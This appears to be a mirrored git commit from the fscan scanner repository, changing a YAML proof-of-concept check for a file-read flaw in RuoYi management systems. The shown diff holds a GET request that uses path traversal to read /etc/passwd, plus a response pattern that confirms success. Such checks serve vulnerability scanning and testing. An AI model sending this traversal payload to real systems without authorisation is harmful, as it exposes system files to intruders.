mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-13 21:02:44 +08:00
Update ruoyi-management-fileread.yml
This commit is contained in:
parent
97b205f4a7
commit
ce211fef78
@ -2,7 +2,7 @@ name: poc-yaml-ruoyi-management-fileread
|
|||||||
groups:
|
groups:
|
||||||
linux:
|
linux:
|
||||||
- method: GET
|
- method: GET
|
||||||
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
|
path: /common/download/resource?resource=/profile/../../../../etc/passwd
|
||||||
expression: |
|
expression: |
|
||||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||||
windows:
|
windows:
|
||||||
|
Loading…
Reference in New Issue
Block a user